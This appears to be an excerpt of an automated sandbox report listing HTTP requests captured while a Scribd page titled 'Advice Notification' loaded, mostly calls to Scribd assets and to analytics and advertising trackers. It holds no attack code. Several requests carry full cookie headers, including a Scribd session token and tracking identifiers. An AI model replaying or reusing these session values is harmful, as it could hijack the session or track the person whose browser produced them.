    Source: global trafficHTTP traffic detected: GET /sp.pl?a=10000&d=Fri%2C%2006%20Dec%202024%2021%3A59%3A27%20GMT&n=5&b=Advice%20Notification%20%7C%20PDF&.yp=10143699&f=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&enc=UTF-8&gdpr=0&us_privacy=1-N-&gpp=DBACOe~CQJNnEAQJNnEAEXikAENA0EwAP_gAEPgACiQGpQCgAGgAcABoAEUAJgAUABHALhAXmA1IC84A4AHAAaABFACYAFAARwC8wAA~BQJNnEAQJNnEAEXikAENA0CgAf_AAIfAAAalAKAAaABwAGgARQAmABQAEcAuEBeYDUgLzgDgAcABoAEUAJgAUABHALzA~1-N-&gpp_sid=6&yv=1.16.5&tagmgr=gtm HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBMpzU2cCEJV-opIdkuWyW4wVQ-qrcuUFEgEBAQHFVGddZ9xS0iMA_eMAAA&S=AQAAAvzM2plJnFSLK2ss9K56YLw
    Source: global trafficHTTP traffic detected: GET /img/word_document/322011392/149x198/75a60db5ed/1732968212?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/356032151/149x198/db7a11388a/1731623834?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s.js HTTP/1.1Host: cdn.siftscience.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/308030757/149x198/2af38cbda9/1731726615?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/309859835/149x198/394d1573f0/1716986829?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/211302755/149x198/e130bab094/1733400677?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/224266633/149x198/196f9b9902/1731728881?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/263504218/149x198/5791495c90/1733362199?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1733522373808&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=90ad4cc1-c7c0-404a-8932-712d98b9d875&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_b192616d&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/287045611447707?v=2.9.178&r=stable&domain=www.scribd.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /7.19.0/rewriteframes.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /p/action/15260218.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.0.1733522367.60.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.0.1733522367.60.0.0; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f
    Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1733522373808&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=90ad4cc1-c7c0-404a-8932-712d98b9d875&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_b192616d&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /7.19.0/rewriteframes.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /action/0?ti=15260218&tm=gtm002&Ver=2&mid=44c4f587-9e43-489b-ac45-0a1621f76cd8&bo=1&sid=61d3cba0b41d11ef9aea290cc24698a9&vid=61d42620b41d11ef884d05fafe2184f7&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Advice%20Notification%20%7C%20PDF&p=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&r=&lt=12196&evt=pageLoad&sv=1&cdb=AQAE&rn=83809 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /p/action/15260218.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /out-4.5.44.js HTTP/1.1Host: m.stripe.networkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/991817613/?random=1733522375967&cv=11&fst=1733522375967&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkWUFsQvLQZk-4EI3fKIPjT4lq3O8BPJ3KYlT3sCMuMlsncJozI1dPMcGxO
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.1.1733522381.46.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.1.1733522381.46.0.0
    Source: global trafficHTTP traffic detected: GET /signals/config/287045611447707?v=2.9.178&r=stable&domain=www.scribd.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/594.df1383.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/42.4541ec.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/300.b58766.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/214.b28244.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/213.76c9ff.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
